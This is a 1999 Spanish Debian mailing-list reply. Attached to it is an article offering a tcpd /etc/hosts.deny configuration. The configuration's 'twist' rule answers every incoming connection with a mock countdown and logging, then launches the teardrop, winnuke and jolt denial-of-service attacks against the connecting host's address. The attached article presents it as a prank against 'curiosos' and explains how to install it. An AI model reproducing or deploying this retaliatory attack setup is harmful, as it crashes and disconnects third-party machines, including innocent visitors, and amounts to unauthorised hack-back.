Re: ¿Alguien usmeando en mi sistema?

[benalb <benjamin@arrakis.es>]

On Thu, 28 Jan 1999, Juanmi Mora wrote:

> Date: Thu, 28 Jan 1999 00:59:46 +0100 (CET)
> From: Juanmi Mora <juanmi@retemail.es>
> To: benalb <benjamin@arrakis.es>
> Cc: Javier Viñuales Gutiérrez <vigu@ctv.es>,
>     Usuarios Debian Español <debian-user-spanish@lists.debian.org>
> Subject: Re: ¿Alguien usmeando en mi sistema?
> Resent-Date: 28 Jan 1999 00:01:45 -0000
> Resent-From: debian-user-spanish@lists.debian.org
> Resent-cc: recipient list not shown: ;
> 
> On Wed, 27 Jan 1999, benalb wrote:
> 
> > Eso de in.telnetd está claro, te han hecho un telnet a tu máquina. No se si
> > habrán entrado, supongo que no por lo de peer died. De todos modos no estaría
> > de más que cerraras tu máquina con hosts.deny. Yo por ejemplo tengo un script
> > que pillé por la red, que le manda al "chico malo" un winnuke, un jolt y un 
> > teardrop, además de pasarme su ip, dominio, y tal a un fichero. Muy práctico
> > porque si el tío insiste, te sirve para escribir al webmaster avisandole del
> > nota. 
> > Si te interesa, ya sabes.
> 
> Hombre... sería un detalle ;-)
> 
> Saludos!!!
> 
> 

La mando adjunta, aunque no se si se permite esto en la lista. Si hay algun
problema y no llega, me la podeis pedir por privado.
Saludos.

Benjamín Albiñana Pérez
mailto:benalb@arrakis.es
Linux User Nº78177
Espacio disponible para publicidad

Title: PLASTAS

 

Script especial para ¡¡¡PLASTAS!!! 

---

 

­Hola a Todos... todos!

 

El otro d¡a estava yo tan aburrido, que me puse a mirarme las man del

tcpd! :-ooooooooooo, y me di¢ por hacer un peque¤o script, que espero

le gustar  a m s de uno:

 

Seguro que un monton de gente para conectar a Internet, o ni siquiera

carga el inetd, o deniega el acceso a todo los servicios, para evitar a

los "curiosos", sobre todo si se frecuenta el irc. Pues he aqu¡ un

bonito truco para que cierta gente se lleve una sorpresa, mejor dicho

un regalito de navidad... :)

 

A continuaci¢n pondr‚ dos ficheros, el /etc/hosts.allow y el

/etc/hosts.deny. La configuraci¢n es muy b sica, apropiada para

aquellos que no necesitan ni telnets, ni ftps, ni gaitas... Si alguien

tiene necesidades diferentes, seguro que sabr  modificarlos

apropiadamente. Debeis tambien aseguraros que /etc/inetd.conf esta

configurado para que llame a /usr/bin/tcpd, pero en la mayoria de los

casos es as¡.

 

El regalito consiste en un buen susto, acompa¤ado de un teardrop, un

winnuke oob, y un jolt al gracioso. Si por casualidad usase cualquier

Windows o un linux inferior a 2.0.32, ya puede ir desconectandose de

internet antes de que acabe la cuenta atr s, o que se prepare a

resetear su m quina. Si esta bien protegido, el susto que se llevar  es

suficiente psicologicamente para que no tenga demasiadas ganas de

seguir incordiando. Adem s, el script hace sonar un sonido, para que

sepais que alguien esta tocando las narices. En mi caso suena el R2D2

cuando se pega un "calambrazo" (woooaaoooo), muy gr fico y divertido,

de veras X-)

 

Adem s, el script crea en /var/log/stupid un log de la gente que ha

intentado entrar en la m quina, para saber quien ha sido, va bien sobre

todo en caso de que la persona estuviese protegida, as¡ sabes a que

atenerte.

 

Si configurais el inetd adem s para que "acepte" conexiones en puertos

altos, sobre el 1000 (mirad /etc/services para saber que servicios

existen en puertos altos), pode¡s tambien sorprender a aquellos

graciosos que con un probe de tcp se dediquen a escanear para mandaros

un icmp "chungo".

 

Pues solo teneis que reemplazar estos ficheros, cambiar los paths que

apuntan a los ejecutables del teardrop, winnuke y jolt, cambiar los que

hace el script cuando alguien se conecta (o sea hacer sonar un sonido,

o sacar un xmessage, o lo que os apetezca), acto seguido ejecutais

"killall -HUP inetd", y ya estareis preparados... ;)

 

--------------- Cut /etc/hosts.allow ---------------------------------

#

# hosts.allow This file describes the names of the hosts which are

# allowed to use the local INET services, as decided

# by the '/usr/sbin/tcpd' server.

#

 

#ALL:LOCAL

--------------- Cut /etc/hosts.allow ---------------------------------

 

--------------- Cut /etc/hosts.deny ----------------------------------

#

# hosts.deny This file describes the names of the hosts which are

# *not* allowed to use the local INET services, as decided

# by the '/usr/sbin/tcpd' server.

#

# The portmap line is redundant, but it is left to remind you that

# the new secure portmap uses hosts.deny and hosts.allow. In particular

# you should know that NFS uses portmap!

#

 

#

# Don't let Bad People(tm) threaten you.

# Invite them to your telnet! ;)

#

# "El Erizo" (c)1997 by aCk

#

 

ALL: ALL: twist (/usr/bin/play /usr/local/audio/woow1.wav \

> /dev/console 2> /dev/console &) ; \

(/bin/echo Bad Luck, %u@%n, say your prayers ; \

/bin/echo 5 seconds left... ; sleep 1 ; \

/bin/echo 4... ; sleep 1 ; \

/bin/echo 3... ; sleep 1 ; \

/bin/echo 2... ; sleep 1 ; \

/bin/echo 1... ; sleep 1 ; \

/bin/echo BOOOOOOOOOOOM! ; \

/bin/echo New Victim!... >>/var/log/stupid ; \

/bin/echo >>/var/log/stupid ; \

/usr/local/bin/teardrop %a %a \

>>/var/log/stupid 2>>/var/log/stupid ; \

/usr/local/bin/winnuke %a \

>>/var/log/stupid 2>>/var/log/stupid ; \

/usr/local/bin/jolt %a %a \

>>/var/log/stupid 2>>/var/log/stupid ; \

/bin/echo >>/var/log/stupid ; \

/bin/echo And The Looser Is... %a %u@%n %c \

>>/var/log/stupid ; \

/bin/echo >>/var/log/stupid ; \

/bin/echo >>/var/log/stupid ) &

--------------- Cut /etc/hosts.deny ----------------------------------

 

Un saludete,

-=>> cHUs GoNzaLeZ <<=-

Internes: chusx@arrakis.es

 

 

 

         
[El Ricón de Fidonet]

 

Para hacerme llegar tus comentarios, sugerencias o si deseas colaborar con esta página, por favor, envíame un E-mail a jbmesa@marqueze.net